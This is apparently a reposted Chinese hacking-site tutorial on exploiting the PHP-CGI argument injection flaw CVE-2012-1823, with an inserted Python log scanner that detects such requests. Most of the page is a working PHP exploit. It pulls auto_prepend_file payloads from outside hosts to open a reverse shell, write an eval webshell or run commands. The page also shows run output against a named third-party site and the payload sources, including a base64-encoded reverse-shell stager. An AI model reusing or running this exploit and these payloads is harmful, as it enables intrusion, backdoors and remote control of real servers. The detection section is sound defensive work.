CVE-2012-1823 PHP-CGI vulnerability exploitation method

Posted: 2019/7/7 11:04:17   Author: 安琪   Source: www.hack361.com   Views: 0   Comments: 0

Vulnerability description: PHP-CGI argument injection

When run as a CGI, PHP versions 5.3.12 and 5.4.2 are vulnerable to an argument injection flaw. The exploit takes advantage of the -d flag to set php.ini directives and thereby achieve code execution. From the advisory: "if there is no unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the 'encoded in a system-defined manner' from the RFC) and then passed to the CGI binary."
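The following Python script is an added example, not part of the original post or of the exploit it reproduces. It shows the defender's side of the description above: it applies the same php-cgi rule to the query string of each access-log request (no literal '=' means the string is split on '+', percent-decoded and handed to the interpreter as argv) and flags any request that would inject an interpreter option, including the percent-encoded dash form (%2d) that a naive substring match for "?-d" misses. The log lines, client addresses and target host are constructed; the log layout is assumed to be Apache's combined format.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Apache combined-log layout.
# Only the request field matters here; addresses and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jul/2019:11:04:17 +0800] "GET /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dhttp://203.0.113.9/x.txt HTTP/1.1" 200 512 "-" "id"
10.0.0.6 - - [07/Jul/2019:11:05:01 +0800] "GET /index.php?page=home&id=5 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [07/Jul/2019:11:05:30 +0800] "GET /index.php?-s HTTP/1.1" 200 4096 "-" "curl/7.64"
10.0.0.8 - - [07/Jul/2019:11:06:12 +0800] "GET /index.php?q=-d HTTP/1.1" 200 128 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Jul/2019:11:06:40 +0800] "GET /index.php?%2dd+allow_url_include%3don HTTP/1.1" 200 64 "-" "curl/7.64"
"""

# Extracts the request target from the quoted request field of a log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/\d\.\d"')


def cgi_argv(query: str) -> list:
    """Reproduce the php-cgi argument handling that CVE-2012-1823 hinges on.

    A query string with no unescaped '=' is split on '+', each piece is
    percent-decoded and passed to php-cgi as a command-line argument.
    A query string that does contain a literal '=' never reaches argv.
    """
    if "=" in query:
        return []
    return [unquote(piece) for piece in query.split("+") if piece]


def is_cve_2012_1823_probe(request_target: str) -> bool:
    """True when the request would inject at least one php-cgi option."""
    _, _, query = request_target.partition("?")
    if not query:
        return False
    return any(arg.startswith("-") for arg in cgi_argv(query))


def scan_log(text: str) -> list:
    """Return (client_ip, decoded argv) for every request that injects options."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group(1)
        if is_cve_2012_1823_probe(target):
            client = line.split(" ", 1)[0]
            hits.append((client, cgi_argv(target.partition("?")[2])))
    return hits


if __name__ == "__main__":
    for client, argv in scan_log(SAMPLE_LOG):
        print(client, argv)
```

Running the script reports the first, third and fifth lines; the fourth line (q=-d) is correctly ignored because its literal '=' keeps the query string on the normal parameter path. The decoded argv for a hit shows exactly which directives (here allow_url_include and auto_prepend_file) the request tried to set, which is the detail worth keeping in an alert. Detection does not replace the fix: php-cgi on an unpatched build should be upgraded to a release that addresses this CVE, or the CGI binary placed behind a web-server rule that rejects option-shaped query strings.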
First, set up a PHP environment on your own machine; WAMP is ideal for this.
 
Exploit code (pasted below):
 
---------------------------- separator (not part of the code) --------------------------------
<?php   
/*  
*PHP CGI Argument Injection Exploit CVE-2012-1823  
*by:cfking  
*bbs:www.90sec.org  
*/ 
set_time_limit(0);  
$help='  
[>] php-cgi Remote code Execution Exploit CVE-2012-1823  
[>] by:cfking@90sec.org  
[>] Usage: php '.$argv[0].' host index.php <1/2/3> <ip/Command> <port>  
[>] Example: php '.$argv[0].' 127.0.0.1 / 2  
 ';  
if($argc<4)exit($help);  
print_r ('  
[>] PHP CGI Argument Injection Exploit CVE-2012-1823  
[>] by:cfking@90sec.org');  
$host=$argv[1];  
$filename=$argv[2];  
if($argv[3]=='1'){  
$port=$argv[5]? $argv[5]:4444;  
if(!$argv[4])exit("\n[-] Please enter IP and PORT\n");  
print "\n[+] Bindshell IP $argv[4] PORT $port\n";  
$payload=$argv[4].':'.$port;  
$target='http://www.cj360.cn/plus/cmd.php';  
}  
if($argv[3]=='2'){  
print "\n[+] Upload backdoor keio.php\n";  
$payload='';  
$target='http://60.190.93.216/manage/css/writeshell.txt';  
}  
if($argv[3]=='3'){  
if(!$argv[4])exit("\n[-] Please enter Command\n");  
print "\n[+] Command $argv[4]\n";  
$payload=$argv[4];  
$target='http://www.cj360.cn/plus/cmds.txt';  
}  
ob_start();   
$sock = fsockopen($host, 80, $errno, $errstr, 30);  
if (!$sock) die("$errstr ($errno)\n");  
fwrite($sock, "GET /$filename?-d+allow_url_include%3don+-d+auto_prepend_file%3d$target+-d+disable_functions%3doff HTTP/1.1\r\n");  
fwrite($sock, "User-Agent: $payload\r\n");  
fwrite($sock, "Host: $host\r\n\r\n");  
$headers = "";  
while ($str = trim(fgets($sock, 4096)))  
$headers .= "$str\n";  
echo "\n";  
$body = "";  
while (!feof($sock))  
$body .= fgets($sock, 4096);  
fclose($sock);  
echo $body;  
ob_end_flush();  
?> 
---------------------------- separator (not part of the code) --------------------------------
 
Save the code above as exp.php in the same directory as the php.exe that WAMP installed (just as installing QQ gives you a QQ.exe).
Mine is D:\wamp\php. In the same directory, create a cmd.bat whose content is cmd.exe.
 
Double-click cmd.bat to open it:
D:\wamp\php>php exp.php gdfreenet.cn index.php 1 127.0.0.1 4444
[>] PHP CGI Argument Injection Exploit CVE-2012-1823
[>] by:cfking@90sec.org
[+] Bindshell IP 127.0.0.1 PORT 4444
9
no socket
0
 
Before running the command, start listening on port 4444 on the local machine.
If it prints "no socket", the reverse shell failed.
 
D:\wamp\php>php exp.php gdfreenet.cn index.php 3 "id"
[>] PHP CGI Argument Injection Exploit CVE-2012-1823
[>] by:cfking@90sec.org
[+] Command id
37
uid=1941(user_7ek0k65m) gid=501(ftpd) groups=501(ftpd)
0
 
The command executed successfully. id is the Linux command that shows which user you are running as,
just as dir lists a directory on Windows and ls lists a directory on Linux.
You can replace id with other commands.
 
D:\wamp\php>php exp.php gdfreenet.cn index.php 2
[>] PHP CGI Argument Injection Exploit CVE-2012-1823
[>] by:cfking@90sec.org
[+] Upload backdoor keio.php
19
webshell Write successful
0
 
"webshell Write successful" means the shell was written successfully.
 
Look at the interface and the meaning is clear:
it uploads a one-liner webshell keio.php whose password is keio. The relevant branch of the exploit is:
print "\n[+] Upload backdoor keio.php\n";  
$payload='';  
$target='http://60.190.93.216/manage/css/writeshell.txt';  
 
The interface contents are as follows:
 
Bindshell interface:
<?php   
$target='PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOyRhcnJheT1leHBsb2RlKCc6JywkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pOyRpcCA9ICRhcnJheVsw
XTskcG9ydCA9ICRhcnJheVsxXTskaXBmID0gQUZfSU5FVDtpZiAoRkFMU0UgIT09IHN0cnBvcygkaXAsICI6IikpIHsJJGlwID0gIlsiLiAkaXAgLiJdIjsJJGlwZ
iA9IEFGX0lORVQ2O31pZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7CSRzID0gJGYoInRjcDovL3skaXB9OnskcG
9ydH0iKTsJJHNfdHlwZSA9ICdzdHJlYW0nO30gZWxzZWlmICgoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7CSRzID0gJGYoJGlwLCAkcG9
ydCk7CSRzX3R5cGUgPSAnc3RyZWFtJzt9IGVsc2VpZiAoKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsJJHMgPSAkZigkaXBmLCBT
T0NLX1NUUkVBTSwgU09MX1RDUCk7CSRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOwlpZiAoISRyZXMpIHsgZGllKCk7IH0JJHNfdHlwZSA9I
Cdzb2NrZXQnO30gZWxzZSB7CWRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7fWlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfXN3aXRjaCAoJHNfdHlwZSkgeyBjYX
NlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhaztjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazt9aWYgKCE
kbGVuKSB7CWRpZSgpO30kYSA9IHVucGFjaygiTmxlbiIsICRsZW4pOyRsZW4gPSAkYVsnbGVuJ107JGIgPSAnJzt3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsJ
c3dpdGNoICgkc190eXBlKSB7IAljYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7CWNhc2UgJ3NvY2tldCc6ICRiI
C49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsJfX0kR0xPQkFMU1snbXNnc29jayddID0gJHM7JEdMT0JBTFNbJ21zZ3NvY2tfdHlwZS
ddID0gJHNfdHlwZTtldmFsKCRiKTtkaWUoKTsgZXhpdDs/Pg==';  
echo $code=base64_decode($target);  
?>
 

Interface that writes the one-liner webshell:
<?php  
$file = fopen("keio.php","w");  
fwrite($file,'<?php eval($_POST[\'keio\'])?>');  
fclose($file);  
echo "webshell Write successful";  
exit;  
?> 
 
Command execution interface:
<?php  
system($_SERVER["HTTP_USER_AGENT"]);  
exit;  
?> 